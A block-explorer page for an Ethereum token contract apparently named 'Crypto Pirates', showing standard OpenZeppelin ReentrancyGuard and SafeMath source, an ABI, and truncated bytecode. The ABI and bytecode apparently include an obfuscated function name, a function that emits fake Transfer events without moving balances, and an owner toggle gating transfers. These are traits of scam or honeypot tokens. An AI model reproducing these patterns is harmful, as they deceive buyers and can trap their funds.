// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (security/ReentrancyGuard.sol)

pragma solidity 0.8.20;


/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be _NOT_ENTERED
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _reentrancyGuardEntered() internal view returns (bool) {
        return _status == _ENTERED;
    }
}

File 9 of 9: SafeMath.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"initialLPAddress","type":"address"},{"internalType":"address","name":"distributor_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_100x000xTimestampopenedAtTimestamptxLimitExcluded","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"alreadyClaimedByAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"beforeStartBuffer","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentOffset","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"distilleryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"ended","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initLiqudity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialLPAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityState","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"}],"name":"maxHoldingAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"address_","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"multiswap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openedAtBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openedAtTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"opener","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"contract IPondCoinSpawner","name":"spawner","type":"address"}],"name":"useSpawner","outputs":[],"stateMutability":"nonpayable","type":"function"}]

61012060405233600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000055620002f560201b60201c565b600a620000639190620006c9565b633b9aca0062000074919062000719565b6080908152506200008a620002f560201b60201c565b600a620000989190620006c9565b633b9aca00620000a9919062000719565b60a090815250348015620000bb575f80fd5b50604051620036c4380380620036c48339818101604052810190620000e19190620007c8565b6040518060400160405280600e81526020017f43727970746f20506972617465730000000000000000000000000000000000008152506040518060400160405280600781526020017f50495241544553000000000000000000000000000000000000000000000000008152508280805f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001ae620001a2620002fd60201b60201c565b6200030460201b60201c565b508260099081620001c0919062000a68565b5081600a9081620001d2919062000a68565b50600160045f6101000a81548160ff021916908315150217905550600160035f62000202620002fd60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050505033600b5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620002a882608051620003c760201b60201c565b3373ffffffffffffffffffffffffffffffffffffffff166101008173ffffffffffffffffffffffffffffffffffffffff16815250504260c081815250504360e08181525050505062000c30565b5f6009905090565b5f33905090565b5f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000438576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200042f9062000baa565b60405180910390fd5b6200044b5f83836200052d60201b60201c565b8060085f8282546200045e919062000bca565b925050819055508060055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200050e919062000c15565b60405180910390a3620005295f83836200053260201b60201c565b5050565b505050565b505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620005c15780860481111562000599576200059862000537565b5b6001851615620005a95780820291505b8081029050620005b98562000564565b945062000579565b94509492505050565b5f82620005db5760019050620006ad565b81620005ea575f9050620006ad565b81600181146200060357600281146200060e5762000644565b6001915050620006ad565b60ff84111562000623576200062262000537565b5b8360020a9150848211156200063d576200063c62000537565b5b50620006ad565b5060208310610133831016604e8410600b84101617156200067e5782820a90508381111562000678576200067762000537565b5b620006ad565b6200068d848484600162000570565b92509050818404811115620006a757620006a662000537565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f620006d582620006b4565b9150620006e283620006bd565b9250620007117fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620005ca565b905092915050565b5f6200072582620006b4565b91506200073283620006b4565b92508282026200074281620006b4565b915082820484148315176200075c576200075b62000537565b5b5092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620007928262000767565b9050919050565b620007a48162000786565b8114620007af575f80fd5b50565b5f81519050620007c28162000799565b92915050565b5f8060408385031215620007e157620007e062000763565b5b5f620007f085828601620007b2565b92505060206200080385828601620007b2565b9150509250929050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200088957607f821691505b6020821081036200089f576200089e62000844565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620009037fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620008c6565b6200090f8683620008c6565b95508019841693508086168417925050509392505050565b5f819050919050565b5f620009506200094a6200094484620006b4565b62000927565b620006b4565b9050919050565b5f819050919050565b6200096b8362000930565b620009836200097a8262000957565b848454620008d2565b825550505050565b5f90565b620009996200098b565b620009a681848462000960565b505050565b5b81811015620009cd57620009c15f826200098f565b600181019050620009ac565b5050565b601f82111562000a1c57620009e681620008a5565b620009f184620008b7565b8101602085101562000a01578190505b62000a1962000a1085620008b7565b830182620009ab565b50505b505050565b5f82821c905092915050565b5f62000a3e5f198460080262000a21565b1980831691505092915050565b5f62000a58838362000a2d565b9150826002028217905092915050565b62000a73826200080d565b67ffffffffffffffff81111562000a8f5762000a8e62000817565b5b62000a9b825462000871565b62000aa8828285620009d1565b5f60209050601f83116001811462000ade575f841562000ac9578287015190505b62000ad5858262000a4b565b86555062000b44565b601f19841662000aee86620008a5565b5f5b8281101562000b175784890151825560018201915060208501945060208101905062000af0565b8683101562000b37578489015162000b33601f89168262000a2d565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000b92601f8362000b4c565b915062000b9f8262000b5c565b602082019050919050565b5f6020820190508181035f83015262000bc38162000b84565b9050919050565b5f62000bd682620006b4565b915062000be383620006b4565b925082820190508082111562000bfe5762000bfd62000537565b5b92915050565b62000c0f81620006b4565b82525050565b5f60208201905062000c2a5f83018462000c04565b92915050565b60805160a05160c05160e05161010051612a4f62000c755f395f610cff01525f818161077b0152610dba01525f6109b701525f610e4601525f610b290152612a4f5ff3fe608060405234801561000f575f80fd5b5060043610610204575f3560e01c806370a0823111610118578063a457c2d7116100ab578063cab5818d1161007a578063cab5818d146105e2578063d5abeb0114610612578063dd62ed3e14610630578063ebad8f1614610660578063f2fde38b1461066a57610204565b8063a457c2d714610548578063a9059cbb14610578578063b7f4e899146105a8578063c2b7bbb6146105c657610204565b80638d981e36116100e75780638d981e36146104d05780638da5cb5b146104ee57806395d89b411461050c5780639c9b4cdb1461052a57610204565b806370a0823114610436578063715018a61461046657806373db1eb2146104705780637c70f3bf146104a057610204565b806326ededb81161019b578063395093511161016a578063395093511461039057806342a5880c146103c0578063486d910f146103de57806349bd5a5e146103fa5780634ed9428e1461041857610204565b806326ededb81461031c5780632d3e69ea14610338578063313ce56714610356578063338d46691461037457610204565b806318160ddd116101d757806318160ddd1461029257806319e99550146102b057806321f83c43146102ce57806323b872dd146102ec57610204565b806306fdde03146102085780630754617214610226578063095ea7b31461024457806312fa6feb14610274575b5f80fd5b610210610686565b60405161021d9190611cd8565b60405180910390f35b61022e610716565b60405161023b9190611d37565b60405180910390f35b61025e60048036038101906102599190611db5565b61073b565b60405161026b9190611e0d565b60405180910390f35b61027c61075d565b6040516102899190611e0d565b60405180910390f35b61029a61076f565b6040516102a79190611e35565b60405180910390f35b6102b8610778565b6040516102c59190611e35565b60405180910390f35b6102d66107aa565b6040516102e39190611e35565b60405180910390f35b61030660048036038101906103019190611e4e565b6107b0565b6040516103139190611e0d565b60405180910390f35b61033660048036038101906103319190611eff565b6107de565b005b6103406108b9565b60405161034d9190611e0d565b60405180910390f35b61035e6108ce565b60405161036b9190611f77565b60405180910390f35b61038e60048036038101906103899190611fba565b6108d6565b005b6103aa60048036038101906103a59190611db5565b61097f565b6040516103b79190611e0d565b60405180910390f35b6103c86109b5565b6040516103d59190611e35565b60405180910390f35b6103f860048036038101906103f39190612052565b6109d9565b005b610402610b02565b60405161040f9190611d37565b60405180910390f35b610420610b27565b60405161042d9190611e35565b60405180910390f35b610450600480360381019061044b9190612090565b610b4b565b60405161045d9190611e35565b60405180910390f35b61046e610b91565b005b61048a60048036038101906104859190612090565b610ba4565b6040516104979190611e0d565b60405180910390f35b6104ba60048036038101906104b591906120f4565b610bf6565b6040516104c79190611e0d565b60405180910390f35b6104d8610c20565b6040516104e59190611d37565b60405180910390f35b6104f6610c45565b6040516105039190611d37565b60405180910390f35b610514610c6d565b6040516105219190611cd8565b60405180910390f35b610532610cfd565b60405161053f9190611d37565b60405180910390f35b610562600480360381019061055d9190611db5565b610d21565b60405161056f9190611e0d565b60405180910390f35b610592600480360381019061058d9190611db5565b610d96565b60405161059f9190611e0d565b60405180910390f35b6105b0610db8565b6040516105bd9190611e35565b60405180910390f35b6105e060048036038101906105db9190612090565b610ddc565b005b6105fc60048036038101906105f79190612090565b610e27565b6040516106099190611e0d565b60405180910390f35b61061a610e44565b6040516106279190611e35565b60405180910390f35b61064a60048036038101906106459190612132565b610e68565b6040516106579190611e35565b60405180910390f35b610668610eea565b005b610684600480360381019061067f9190612090565b610f47565b005b6060600980546106959061219d565b80601f01602080910402602001604051908101604052809291908181526020018280546106c19061219d565b801561070c5780601f106106e35761010080835404028352916020019161070c565b820191905f5260205f20905b8154815290600101906020018083116106ef57829003601f168201915b5050505050905090565b600b5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f80610745610fc9565b9050610752818585610fd0565b600191505092915050565b600f5f9054906101000a900460ff1681565b5f600854905090565b5f7f0000000000000000000000000000000000000000000000000000000000000000436107a591906121fa565b905090565b61070881565b5f806107ba610fc9565b90506107c7858285611193565b6107d285858561121e565b60019150509392505050565b6107e661187e565b5f5b838390508110156108b3578383828181106108065761080561222d565b5b905060200201602081019061081b9190612090565b73ffffffffffffffffffffffffffffffffffffffff16600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108989190611e35565b60405180910390a380806108ab9061225a565b9150506107e8565b50505050565b5f60045f9054906101000a900460ff16905090565b5f6009905090565b6108de61187e565b5f5b83839050811015610979578160025f8686858181106109025761090161222d565b5b90506020020160208101906109179190612090565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806109719061225a565b9150506108e0565b50505050565b5f80610989610fc9565b90506109aa81858561099b8589610e68565b6109a591906122a1565b610fd0565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b610a0533600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846107b0565b610a44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a3b9061231e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1663a1e463d833846040518363ffffffff1660e01b8152600401610a7f92919061233c565b6020604051808303815f875af1158015610a9b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610abf9190612377565b610afe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af5906123ec565b60405180910390fd5b5050565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f60055f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610b9961187e565b610ba25f6118fc565b565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b600e602052815f5260405f20602052805f5260405f205f915091509054906101000a900460ff1681565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600a8054610c7c9061219d565b80601f0160208091040260200160405190810160405280929190818152602001828054610ca89061219d565b8015610cf35780601f10610cca57610100808354040283529160200191610cf3565b820191905f5260205f20905b815481529060010190602001808311610cd657829003601f168201915b5050505050905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f80610d2b610fc9565b90505f610d388286610e68565b905083811015610d7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d749061247a565b60405180910390fd5b610d8a8286868403610fd0565b60019250505092915050565b5f80610da0610fc9565b9050610dad81858561121e565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b610de461187e565b80600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6002602052805f5260405f205f915054906101000a900460ff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f60065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ef261187e565b6001151560045f9054906101000a900460ff16151503610f2a575f60045f6101000a81548160ff021916908315150217905550610f45565b600160045f6101000a81548160ff0219169083151502179055505b565b610f4f61187e565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb490612508565b60405180910390fd5b610fc6816118fc565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361103e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103590612596565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a390612624565b60405180910390fd5b8060065f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111869190611e35565b60405180910390a3505050565b5f61119e8484610e68565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114611218578181101561120a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112019061268c565b60405180910390fd5b6112178484848403610fd0565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361128c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112839061271a565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036112fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f1906127a8565b60405180910390fd5b5f811161133c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133390612836565b60405180910390fd5b4360075f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061138883826119bf565b506001151560045f9054906101000a900460ff16151514806113dc57506113ad610c45565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8061141957506113ea610c45565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156118235760035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156114bb575060035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611671576114cb8383836119eb565b611535816040518060600160405280602681526020016129f46026913960055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546119f09092919063ffffffff16565b60055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506115c68160055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611a5290919063ffffffff16565b60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516116649190611e35565b60405180910390a361181e565b61167c838383611aaf565b6116e6816040518060600160405280602681526020016129f46026913960055f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546119f09092919063ffffffff16565b60055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506117778160055f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611a5290919063ffffffff16565b60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516118159190611e35565b60405180910390a35b611879565b6001151560045f9054906101000a900460ff16151514611878576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161186f90612877565b60405180910390fd5b5b505050565b611886610fc9565b73ffffffffffffffffffffffffffffffffffffffff166118a4611ab4565b73ffffffffffffffffffffffffffffffffffffffff16146118fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118f1906128df565b60405180910390fd5b565b5f60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f808211156119e1576119d183611ac7565b156119e0576119df83611b19565b5b5b6001905092915050565b505050565b5f838311158290611a3757604051